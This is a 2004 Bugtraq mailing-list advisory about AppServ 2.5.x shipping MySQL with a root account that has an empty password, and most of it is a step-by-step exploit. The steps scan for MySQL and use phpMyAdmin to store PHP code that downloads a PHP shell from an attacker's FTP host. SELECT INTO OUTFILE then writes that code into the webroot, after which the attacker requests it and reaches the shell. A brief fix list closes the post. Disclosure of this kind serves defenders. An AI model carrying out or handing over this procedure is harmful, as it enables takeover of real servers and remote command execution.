Date: 18 Nov 2004 16:18:15 -0000
From: saudi linux <ksa2ksa@yahoo.com.>
To: bugtraq@securityfocus.com
Subject: AppServ 2.5.x and Prior Exploit
what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages.
Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver.
AppServ URL:http://www.appservnetwork.com
Vulnerability Ver: 2.5.X and prior
problem :
the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.
Expliot Method
1)scan tool (SuperScan or whatever)
this step to scan MySQL service on port 3306
2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE (Internet Explorer).
>From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)
3)if we success the index page for AppServ open
4)Now we can edit the databases and tables in Mysql by phpmyadmin
>From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)
5)default MySQL Server come with two database (test,mysql),our target is (mysql ).
Now we can add new table contains our exploit
- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :
==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY);
ftp_quit($conn_id);
?>
==============end=====================
the attacker could use " Windows FTP Server" or any FTP daemon, it's not a matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.
6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'
7)Query.php contain Our PHP code
8)if we success we can reguest
(http://xxx.xxx.xxx.xxx/Query.php)
9)if FTP connection successful and downloaded phpshell.php in the victim PC you can send new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)
10) Game's Over
Fix
=====
1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script
discovered by Saudi Linux
